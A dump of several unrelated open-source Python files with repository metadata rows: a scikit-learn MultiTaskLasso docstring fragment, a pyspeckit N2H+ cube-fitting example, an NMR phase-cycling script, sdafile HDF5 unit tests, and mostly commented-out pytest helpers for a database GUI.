max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
Attributes
----------
``coef_`` : array, shape = (n_tasks, n_features)
parameter vector (W in the cost function formula)
``intercept_`` : array, shape = (n_tasks,)
independent term in decision function.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.MultiTaskLasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [[0, 0], [1, 1], [2, 2]])
MultiTaskLasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, tol=0.0001, warm_start=False)
>>> print(clf.coef_)
[[ 0.89393398 0. ]
[ 0.89393398 0. ]]
>>> print(clf.intercept_)
[ 0.10606602 0.10606602]
See also
--------
Lasso, MultiTaskElasticNet
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
copy_X=True, max_iter=1000, tol=1e-4, warm_start=False):
self.alpha = alpha
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.l1_ratio = 1.0
| bsd-3-clause | 7,439,259,739,322,190,000 | 34.515472 | 97 | 0.585596 | false |
keflavich/pyspeckit-obsolete | examples/n2hp_cube_example.py | 1 | 2271 | import pyspeckit
import os
if not os.path.exists('n2hp_cube.fit'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.download_file('ftp://cdsarc.u-strasbg.fr/pub/cats/J/A%2BA/472/519/fits/opha_n2h.fit')
with fits.open(f) as ff:
ff[0].header['CUNIT3'] = 'm/s'
for kw in ['CTYPE4','CRVAL4','CDELT4','CRPIX4']:
del ff[0].header[kw]
ff.writeto('n2hp_cube.fit')
# Load the spectral cube
spc = pyspeckit.Cube('n2hp_cube.fit')
# Register the fitter
# The N2H+ fitter is 'built-in' but is not registered by default; this example
# shows how to register a fitting procedure
# 'multi' indicates that it is possible to fit multiple components and a
# background will not automatically be fit 4 is the number of parameters in the
# model (excitation temperature, optical depth, line center, and line width)
spc.Registry.add_fitter('n2hp_vtau',pyspeckit.models.n2hp.n2hp_vtau_fitter,4,multisingle='multi')
# Run the fitter
spc.fiteach(fittype='n2hp_vtau', multifit=True,
guesses=[5,0.5,3,1], # Tex=5K, tau=0.5, v_center=12, width=1 km/s
signal_cut=6, # minimize the # of pixels fit for the example
)
# There are a huge number of parameters for the fiteach procedure. See:
# http://pyspeckit.readthedocs.org/en/latest/example_nh3_cube.html
# http://pyspeckit.readthedocs.org/en/latest/cubes.html?highlight=fiteach#pyspeckit.cubes.SpectralCube.Cube.fiteach
#
# Unfortunately, a complete tutorial on this stuff is on the to-do list;
# right now the use of many of these parameters is at a research level.
# However, [email protected] will support them! They are being used
# in current and pending publications
# Save the fitted parameters to a FITS file, and overwrite one if one exists
spc.write_fit('n2hp_fitted_parameters.fits', clobber=True)
# Show an integrated image
spc.mapplot()
# This particular cube is a 2x2 image; you can click on any pixel to see its
# spectrum & fit
# plot one of the fitted spectra
spc.plot_spectrum(14,27,plot_fit=True)
# Show an image of the best-fit velocity
spc.mapplot.plane = spc.parcube[2,:,:]
spc.mapplot(estimator=None)
# running in script mode, the figures won't show by default on some systems
import pylab as pl
pl.show()
| mit | -5,961,305,820,016,318,000 | 39.553571 | 115 | 0.722589 | false |
mrosenstihl/PulsePrograms | LED/LED_res.py | 1 | 1841 | class ParameterSet:
"""
From
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52308
Alex Martelli
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
def cyclops(timesignal, r_phase, accumulation_object):
"""
This is CYCLOPS phase cycling.
Receiver phase must advance with each step by 90.
Real channel and Imaginary channel get subtracted/added to the Real/Imag channel
of the current accumulation.
"""
if r_phase%4 == 0:# in [0,4,8,12]
ts = timesignal+0
ts.y[0] = timesignal.y[0]
ts.y[1] = timesignal.y[1]
accumulation_object += ts
if (r_phase-1)%4 == 0:#[1,5,9,13]:
ts = timesignal+0
ts.y[0] = -1*timesignal.y[1]
ts.y[1] = timesignal.y[0]
accumulation_object += ts
if (r_phase-2)%4 == 0:#[2,6,10,14]
ts = timesignal+0
ts.y[0] = -1*timesignal.y[0]
ts.y[1] = -1*timesignal.y[1]
accumulation_object += ts
if (r_phase-3)%4 == 0: #in [3,7,11,15]:
ts = timesignal+0
ts.y[0] = timesignal.y[1]
ts.y[1] = -1*timesignal.y[0]
accumulation_object += ts
def result():
for res in results:
if not isinstance(res, ADC_Result):
print "ERROR: ", res
continue
descriptions = res.get_description_dictionary()
# rebuild the dictionary because __init__ can't take unicode keys
temp_description={}
for key in descriptions:
temp_description[str(key)] = descriptions[key]
descriptions=temp_description
desc = ParameterSet(**descriptions)
data["Timesignal"]=res
if int(desc.run)%int(desc.accu_length) == 0:
accu=Accumulation()
cyclops(res,int(desc.cyclops),accu)
data["Accu %.1e"%(float(desc.tmix))]=accu | bsd-2-clause | 3,961,073,646,389,585,000 | 31.315789 | 84 | 0.573601 | false |
enthought/sandia-data-archive | sdafile/tests/test_sda_file.py | 1 | 26970 | import io
import os
import random
import shutil
import unittest
import numpy as np
from numpy.testing import assert_array_equal, assert_equal
from sdafile.exceptions import BadSDAFile
from sdafile.sda_file import SDAFile
from sdafile.testing import (
BAD_ATTRS, GOOD_ATTRS, MockRecordInserter, TEST_NUMERIC, TEST_CHARACTER,
TEST_LOGICAL, TEST_SPARSE, TEST_SPARSE_COMPLEX, TEST_CELL, TEST_STRUCTURE,
TEST_UNSUPPORTED, data_path, temporary_file, temporary_h5file
)
from sdafile.utils import (
get_decoded, get_record_type, set_encoded, write_header,
)
class TestSDAFileInit(unittest.TestCase):
def test_mode_r(self):
self.assertInitNew('r', exc=IOError)
self.assertInitExisting('r', {}, BadSDAFile)
self.assertInitExisting('r', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('r', GOOD_ATTRS)
def test_mode_r_plus(self):
self.assertInitNew('r+', exc=IOError)
self.assertInitExisting('r+', exc=BadSDAFile)
self.assertInitExisting('r+', exc=BadSDAFile)
self.assertInitExisting('r+', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('r+', GOOD_ATTRS)
def test_mode_w(self):
self.assertInitNew('w')
self.assertInitExisting('w')
def test_mode_x(self):
self.assertInitNew('x')
self.assertInitExisting('x', exc=IOError)
def test_mode_w_minus(self):
self.assertInitNew('w-')
self.assertInitExisting('w-', exc=IOError)
def test_mode_a(self):
self.assertInitNew('a')
self.assertInitExisting('a', GOOD_ATTRS)
self.assertInitExisting('a', BAD_ATTRS, BadSDAFile)
self.assertInitExisting('a', {}, BadSDAFile)
def test_mode_default(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name)
self.assertEqual(sda_file.mode, 'a')
def test_pass_kw(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w', driver='core')
with sda_file._h5file('r') as h5file:
self.assertEqual(h5file.driver, 'core')
def assertAttrs(self, sda_file, attrs={}):
""" Assert sda_file attributes are equal to passed values.
if ``attrs`` is empty, check that ``attrs`` take on the default values.
"""
if attrs == {}: # treat as if new
self.assertEqual(sda_file.Created, sda_file.Updated)
attrs = {}
write_header(attrs)
del attrs['Created']
del attrs['Updated']
attrs = get_decoded(attrs)
for attr, expected in attrs.items():
actual = getattr(sda_file, attr)
self.assertEqual(actual, expected)
def assertInitExisting(self, mode, attrs={}, exc=None):
""" Assert attributes or error when init with existing file.
Passed ``attrs`` are used when creating the existing file. When ``exc``
is None, this also tests that the ``attrs`` are preserved.
"""
with temporary_h5file() as h5file:
name = h5file.filename
if attrs is not None and len(attrs) > 0:
set_encoded(h5file.attrs, **attrs)
h5file.close()
if exc is not None:
with self.assertRaises(exc):
SDAFile(name, mode)
else:
sda_file = SDAFile(name, mode)
self.assertAttrs(sda_file, attrs)
def assertInitNew(self, mode, attrs={}, exc=None):
""" Assert attributes or error when init with non-existing file. """
with temporary_file() as file_path:
os.remove(file_path)
if exc is not None:
with self.assertRaises(exc):
SDAFile(file_path, mode)
else:
sda_file = SDAFile(file_path, mode)
self.assertAttrs(sda_file)
class TestSDAFileProperties(unittest.TestCase):
def test_file_properties(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
self.assertEqual(sda_file.mode, 'w')
self.assertEqual(sda_file.name, file_path)
def test_set_writable(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
self.assertEqual(sda_file.Writable, 'yes')
sda_file.Writable = 'no'
self.assertEqual(sda_file.Writable, 'no')
with self.assertRaises(ValueError):
sda_file.Writable = True
with self.assertRaises(ValueError):
sda_file.Writable = False
sda_file = SDAFile(file_path, 'r')
with self.assertRaises(ValueError):
sda_file.Writable = 'yes'
class TestSDAFileInsert(unittest.TestCase):
def test_read_only(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name, 'r')
with self.assertRaises(IOError):
sda_file.insert('test', [1, 2, 3])
def test_no_write(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.Writable = 'no'
with self.assertRaises(IOError):
sda_file.insert('test', [1, 2, 3])
def test_invalid_deflate(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=-1)
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=10)
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3], deflate=None)
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('test/', [1, 2, 3])
with self.assertRaises(ValueError):
sda_file.insert('test\\', [1, 2, 3])
def test_label_exists(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', [1, 2, 3])
with self.assertRaises(ValueError):
sda_file.insert('test', [1, 2, 3])
def test_timestamp_update(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.insert('test', [0, 1, 2])
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_invalid_structure_key(self):
record = [0, 1, 2, {' bad': np.arange(4)}]
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.insert('something_bad', record)
self.assertEqual(sda_file.labels(), [])
def test_insert_called(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
called = []
sda_file._registry._inserters = [MockRecordInserter(called)]
sda_file.insert('foo', True, 'insert_called', 0)
self.assertEqual(called, ['insert_called'])
def test_structures(self):
structure = {
'foo': 'foo',
'bar': np.arange(4),
'baz': np.array([True, False])
}
failures = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_STRUCTURE +
TEST_STRUCTURE + TEST_SPARSE + TEST_SPARSE_COMPLEX
)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
# Store homogeneous structures
label = 'test'
deflate = 0
objs = [structure] * 5
sda_file.insert(label, objs, label, deflate, as_structures=True)
# Check the type
with sda_file._h5file('r') as h5file:
record_type = get_record_type(h5file[label].attrs)
self.assertEqual(record_type, 'structures')
# Other record types should fail
for data in failures:
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
# Inhomogenous records should fail
data = [structure, structure.copy()]
data[0]['baz'] = 10 # change record type
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
del data[0]['baz']
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
# Cell of non-structures should fail
data = [True]
with self.assertRaises(ValueError):
sda_file.insert('bad', data, 'bad', 0, as_structures=True)
def test_from_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
contents = b'01'
with temporary_file() as source_file:
with open(source_file, 'wb') as f:
f.write(contents)
label = sda_file.insert_from_file(source_file)
sda_file.describe(label, label)
self.assertTrue(source_file.endswith(label))
def test_from_file_failure(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with temporary_file() as source_file:
pass
# The source file is gone
with self.assertRaises(ValueError):
sda_file.insert_from_file(source_file)
def test_unsupported(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
for i, obj in enumerate(TEST_UNSUPPORTED):
label = 'test' + str(i)
with self.assertRaises(ValueError):
sda_file.insert(label, obj, label, 0)
# Make sure the 'Updated' attr does not change
self.assertEqual(sda_file.Updated, 'Unmodified')
class TestSDAFileExtract(unittest.TestCase):
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.extract('test/')
with self.assertRaises(ValueError):
sda_file.extract('test\\')
def test_label_not_exists(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.extract('test')
def test_no_timestamp_update(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', [0, 1, 2])
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.extract('test')
self.assertEqual(sda_file.Updated, 'Unmodified')
def test_round_trip(self):
test_set = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_STRUCTURE
)
def assert_nested_equal(a, b):
# Unravel lists and tuples
if isinstance(a, (list, tuple)) or isinstance(b, (list, tuple)):
assert_equal(len(a), len(b))
for item_a, item_b in zip(a, b):
assert_nested_equal(item_a, item_b)
else:
return assert_equal(a, b)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(test_set):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
assert_equal(extracted, data)
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(TEST_CELL):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
assert_nested_equal(extracted, data)
test_set = TEST_SPARSE + TEST_SPARSE_COMPLEX
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
for i, data in enumerate(test_set):
label = "test" + str(i)
sda_file.insert(label, data, '', i % 10)
extracted = sda_file.extract(label)
expected = data.tocoo()
self.assertEqual(extracted.dtype, expected.dtype)
assert_equal(extracted.row, expected.row)
assert_equal(extracted.col, expected.col)
assert_equal(extracted.data, expected.data)
def test_to_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
contents = b'Hello world'
sda_file.insert('test', io.BytesIO(contents))
with temporary_file() as destination_path:
with self.assertRaises(IOError):
sda_file.extract_to_file('test', destination_path)
sda_file.extract_to_file('test', destination_path, True)
with open(destination_path, 'rb') as f:
extracted = f.read()
self.assertEqual(extracted, contents)
# The file is closed and gone, try again
sda_file.extract_to_file('test', destination_path, True)
with open(destination_path, 'rb') as f:
extracted = f.read()
self.assertEqual(extracted, contents)
def test_to_file_non_file(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', 'not a file record')
with temporary_file() as destination_path:
with self.assertRaises(ValueError):
sda_file.extract_to_file('test', destination_path, True)
class TestSDAFileDescribe(unittest.TestCase):
def test_read_only(self):
with temporary_h5file() as h5file:
name = h5file.filename
set_encoded(h5file.attrs, **GOOD_ATTRS)
h5file.close()
sda_file = SDAFile(name, 'r')
with self.assertRaises(IOError):
sda_file.describe('test', 'a test')
def test_no_write(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.Writable = 'no'
with self.assertRaises(IOError):
sda_file.describe('test', 'a test')
def test_invalid_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.describe('test/', 'a test')
with self.assertRaises(ValueError):
sda_file.describe('test\\', 'a test')
def test_missing_label(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with self.assertRaises(ValueError):
sda_file.describe('test', 'a test')
def test_happy_path(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.insert('test', [1, 2, 3])
sda_file.describe('test', 'second')
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['test'].attrs, 'Description')
self.assertEqual(attrs['Description'], 'second')
# Make sure the 'Updated' attr gets updated
self.assertNotEqual(sda_file.Updated, 'Unmodified')
class TestSDAFileMisc(unittest.TestCase):
def test_labels(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('l0', [0])
sda_file.insert('l1', [1])
self.assertEqual(sorted(sda_file.labels()), ['l0', 'l1'])
def test_remove(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
labels = []
test_set = (
TEST_NUMERIC + TEST_LOGICAL + TEST_CHARACTER + TEST_CELL +
TEST_STRUCTURE + TEST_STRUCTURE + TEST_SPARSE +
TEST_SPARSE_COMPLEX
)
for i, obj in enumerate(test_set):
label = 'test' + str(i)
labels.append(label)
sda_file.insert(label, obj)
with self.assertRaises(ValueError):
sda_file.remove()
with self.assertRaises(ValueError):
sda_file.remove('not a label')
random.shuffle(labels)
removed = labels[::2]
kept = labels[1::2]
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
sda_file.remove(*removed)
self.assertEqual(sorted(sda_file.labels()), sorted(kept))
# Make sure metadata is preserved and data can be extracted
with sda_file._h5file('r') as h5file:
for label in kept:
attrs = h5file[label].attrs
self.assertIn('Deflate', attrs)
self.assertIn('Description', attrs)
self.assertIn('RecordType', attrs)
self.assertIn('Empty', attrs)
sda_file.extract(label)
sda_file.remove(*kept)
self.assertEqual(sda_file.labels(), [])
self.assertEqual(sda_file.FormatVersion, '1.1')
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_probe(self):
cols = [
'RecordType', 'Description', 'Empty', 'Deflate', 'Complex',
'ArraySize', 'Sparse', 'RecordSize', 'Class', 'FieldNames',
'Command',
]
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
labels = []
for i, obj in enumerate(TEST_NUMERIC[:4]):
label = 'bar' + str(i)
labels.append(label)
sda_file.insert(label, obj, label, i)
for i, obj in enumerate(TEST_NUMERIC[4:6]):
label = 'foo' + str(i)
labels.append(label)
sda_file.insert(label, obj, label, i)
state = sda_file.probe()
state.sort_index()
self.assertEqual(len(state), 6)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels)
assert_array_equal(state['Description'], labels)
assert_array_equal(state['Deflate'], [0, 1, 2, 3, 0, 1])
state = sda_file.probe('bar.*')
state.sort_index()
self.assertEqual(len(state), 4)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels[:4])
assert_array_equal(state['Description'], labels[:4])
assert_array_equal(state['Deflate'], [0, 1, 2, 3])
state = sda_file.probe('foo.*')
state.sort_index()
self.assertEqual(len(state), 2)
assert_array_equal(state.columns, cols)
assert_array_equal(state.index, labels[4:])
assert_array_equal(state['Description'], labels[4:])
assert_array_equal(state['Deflate'], [0, 1])
class TestSDAFileReplaceUpdate(unittest.TestCase):
def test_replace(self):
with temporary_file() as file_path:
sda_file = SDAFile(file_path, 'w')
sda_file.insert('test', TEST_NUMERIC[0], 'test_description', 1)
replacements = TEST_NUMERIC[:1]
random.shuffle(replacements)
replacements = replacements[:10]
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
for new_data in replacements:
sda_file.replace('test', new_data)
assert_equal(sda_file.extract('test'), new_data)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(
h5file['test'].attrs, 'Deflate', 'Description'
)
self.assertEqual(attrs['Description'], 'test_description')
self.assertEqual(attrs['Deflate'], 1)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
def test_update_object_on_non_object(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example A1'
data = sda_file.extract('example I')
with self.assertRaises(ValueError):
sda_file.update_object(label, data)
def test_update_object_with_equivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
label = 'example I'
# Replace some stuff with the same type
data = sda_file.extract(label)
data['Parameter'] = np.arange(5)
sda_file.update_object(label, data)
extracted = sda_file.extract(label)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['example I'].attrs)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
# Validate equality
self.assertEqual(attrs['RecordType'], 'object')
self.assertEqual(attrs['Class'], 'ExampleObject')
self.assertIsInstance(extracted, dict)
self.assertEqual(len(extracted), 1)
assert_equal(extracted['Parameter'], data['Parameter'])
def test_update_object_with_inequivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example I'
# Replace some stuff with different type
data = sda_file.extract(label)
data['Parameter'] = 'hello world'
with self.assertRaises(ValueError):
sda_file.update_object(label, data)
def test_update_object_with_non_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example I'
# Replace some stuff with a non-dictionary
with self.assertRaises(ValueError):
sda_file.update_object(label, 'hello')
def test_update_objects_on_non_objects(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example A1'
data = sda_file.extract('example J')
with self.assertRaises(ValueError):
sda_file.update_objects(label, data)
def test_update_objects_with_equivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
with sda_file._h5file('a') as h5file:
set_encoded(h5file.attrs, Updated='Unmodified')
label = 'example J'
# Replace some stuff with the same type
data = sda_file.extract(label)
data[0, 0]['Parameter'] = np.arange(5)
sda_file.update_objects(label, data)
extracted = sda_file.extract(label)
with sda_file._h5file('r') as h5file:
attrs = get_decoded(h5file['example J'].attrs)
self.assertNotEqual(sda_file.Updated, 'Unmodified')
# Validate equality
self.assertEqual(attrs['RecordType'], 'objects')
self.assertEqual(attrs['Class'], 'ExampleObject')
self.assertIsInstance(extracted, np.ndarray)
self.assertEqual(extracted.shape, (2, 1))
assert_equal(extracted[0, 0]['Parameter'], data[0, 0]['Parameter'])
assert_equal(extracted[1, 0]['Parameter'], data[1, 0]['Parameter'])
def test_update_objects_with_inequivalent_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example J'
# Replace some stuff with different type
data = sda_file.extract(label)
data[0, 0]['Parameter'] = 'hello world'
with self.assertRaises(ValueError):
sda_file.update_objects(label, data)
def test_update_objects_with_non_record(self):
reference_path = data_path('SDAreference.sda')
with temporary_file() as file_path:
# Copy the reference, which as an object in it.
shutil.copy(reference_path, file_path)
sda_file = SDAFile(file_path, 'a')
label = 'example J'
# Replace some stuff with a non-dictionary
with self.assertRaises(ValueError):
sda_file.update_objects(label, 'hello')
| bsd-3-clause | -7,877,897,679,665,350,000 | 35.743869 | 79 | 0.559473 | false |
bibsian/database-development | test/logiclayer/test_helpers.py | 1 | 10556 | #! /usr/bin/env python
import pytest
from pandas import concat, DataFrame, read_csv, to_numeric, wide_to_long
from numpy import where
import re
import decimal as dc
import sys, os
from poplerGUI.logiclayer import class_logconfig as log
from poplerGUI.logiclayer.datalayer import config as orm
rootpath = os.path.dirname(os.path.dirname(os.path.dirname( __file__ )))
end = os.path.sep
sys.path.append(os.path.realpath(os.path.dirname(
rootpath + 'logiclayer' + end)))
os.chdir(rootpath)
def test_wide_to_long_(df_test_6):
data = df_test_6
data['id'] = data.index
new = wide_to_long(
data, ["trait", "growth"], i="id", j="year")
new['year'] = new.index.get_level_values("year")
print(new)
assert ("growth" in new.columns.values.tolist()) is True
assert ("trait" in new.columns.values.tolist()) is True
assert ("year" in new.columns.values.tolist()) is True
assert ("SITE" in new.columns.values.tolist()) is True
new.reset_index(drop=True, inplace=True)
# @pytest.fixture
# def check_int():
# def check_int(x):
# ''' helper function to check if text can be converted to int'''
# try:
# int(x)
# return True
# except ValueError:
# return False
#
# return check_int
#
# def test_int_check(check_int):
# ''' test integer checker'''
# assert check_int('4') is True
# assert check_int('word') is False
#
# @pytest.fixture
# def produce_null_df():
# def produce_null_df(ncols, colnames, dflength, nullvalue):
# '''
# Helper function to create a dataframe of null
# values for concatinating with formated data
# '''
# try:
# list(colnames)
# int(ncols)
# int(dflength)
# str(nullvalue)
# except Exception as e:
# print(str(e))
# ValueError('Invalid data types for arguments')
#
# p = re.compile('\w+\s')
# matches = p.match(nullvalue)
# if matches is None:
# nullvalue = (nullvalue + ' ')
#
# allnulls = concat(
# [DataFrame(
# re.sub(' ', ' ', (str(nullvalue)*dflength)).split())]*
# len(colnames), axis=1)
# allnulls.columns = colnames
# return allnulls
#
# return produce_null_df
#
#
# def test_nulldf(produce_null_df):
# '''test null df generator'''
# n = 2
# colnames = ['c1', 'c2']
# dflen = 5
# Note null value MUST be folled by space
# null = 'NULL'
#
# testdf = produce_null_df(n, colnames, dflen, null)
# print(testdf)
# assert (list(testdf.columns) == colnames) is True
# assert ('NULL' in testdf.values) is True
# assert ('NULL' not in testdf.values) is False
# assert (1 not in testdf.values) is True
# assert ('x' not in testdf.values) is True
# assert (len(testdf) == dflen) is True
#
#
# @pytest.fixture
# def decimal_df_col():
# def decimal_df_col(dataframe, colname):
# dataframe[colname].apply(dc.Decimal)
# return dataframe
# return decimal_df_col
#
#
# def test_decimal(decimal_df_col, df_test_2):
# print(df.dtypes)
# decimal_df_col(df, 'DENSITY')
# print(df)
# print(df.dtypes)
#
#
# @pytest.fixture
# def updated_df_values():
# def updated_df_values(olddataframe, newdataframe, logger, name):
# '''
# Helper function to aid in logging the difference between
# dataframes after user have modified the entries.
# For example, inputing latitude and longitude for the site
# table or the extent of spatial replication in the main table.
#
# Arguments:
# olddataframe = An unmodified dataframe
# newdataframe = A user modified dataframe
# logger = An instance of a logger handler
# table = A string with the name to append to log
# '''
# try:
# assert (
# olddataframe.columns.values.tolist() ==
# newdataframe.columns.values.tolist()) is True
# except Exception as e:
# print(str(e))
# raise AttributeError(
# 'Dataframe columns are not equivalent')
# if (
# len(olddataframe) == 0 or
# olddataframe is None or
# len(olddataframe.columns) == 0
# ):
# logger.info('{} "{}"'.format(
# name,
# 'NULL'))
# else:
# diffdf = (olddataframe != newdataframe)
# for i, item in enumerate(diffdf.columns):
# if any(diffdf[item].values.tolist()):
# index = where(diffdf[item].values)[0].tolist()
# logger.info('{} "{}" = {} to {}'.format(
# name,
# item,
# olddataframe.loc[index, item].values.tolist(),
# newdataframe.loc[index, item].values.tolist()))
# else:
# pass
# return updated_df_values
#
#
# @pytest.fixture
# def mylog():
# mylog = log.configure_logger(
# 'tableformat',
# rootpath + end +' logs/test_df_diff.log'
# )
# return mylog
#
# @pytest.fixture
# def metadf_og():
# if sys.platform == "darwin":
# metapath = (
# rootpath + end + 'test' + end + 'Datasets_manual_test' +
# "/meta_file_test.csv")
# elif sys.platform == "win32":
# #=======================#
# #Paths to data and conversion of files to dataframe
# #=======================#
# metapath = (
# rootpath + end + 'test' + end + 'Datasets_manual_test' +
# "/meta_file_test.csv")
#
# metadf = read_csv(metapath, encoding="iso-8859-11")
# return metadf
#
#
# @pytest.fixture
# def metadf_mod(metadf_og):
# new = metadf_og.copy()
# new.loc[3, 'treatment_type'] = 'maybe...'
# return new
#
#
# def test_logger_and_df_diff(updated_df_values, mylog, old, new):
# updated_df_values(old, new, mylog, 'maintable')
#
# def test_logger_and_metadf_diff(
# updated_df_values, mylog, metadf_og, metadf_mod):
# print(metadf_og.columns)
# print(metadf_og.dtypes)
# print('---------------')
# print(metadf_mod.columns)
# print(metadf_mod.dtypes)
# print('----------------')
# updated_df_values(metadf_og, metadf_mod, mylog, 'maintable')
#
#
# @pytest.fixture
# def maindf():
# df = read_csv('DatabaseConfig/main_table_test.csv')
# return df
#
# @pytest.fixture
# def convert_typetest():
# def convert(dataframe, types):
# for i in dataframe.columns:
# if types[i] in ['NUMERIC', 'INTEGER', 'Integer']:
# dataframe[i] = to_numeric(
# dataframe[i], errors='coerce')
# elif types[i] in ['VARCHAR', 'TEXT']:
# dataframe[i] = dataframe[i].astype(object)
# return convert
#
# def test_convert_types(maindf, convert_typetest):
# print(maindf.dtypes)
# convert_typetest(maindf, orm.maintypes)
# print(maindf.dtypes)
#
# @pytest.fixture
# def year_strip():
# def year_strip(dateformat):
# f = dateformat
# found = re.search('Y+', f)
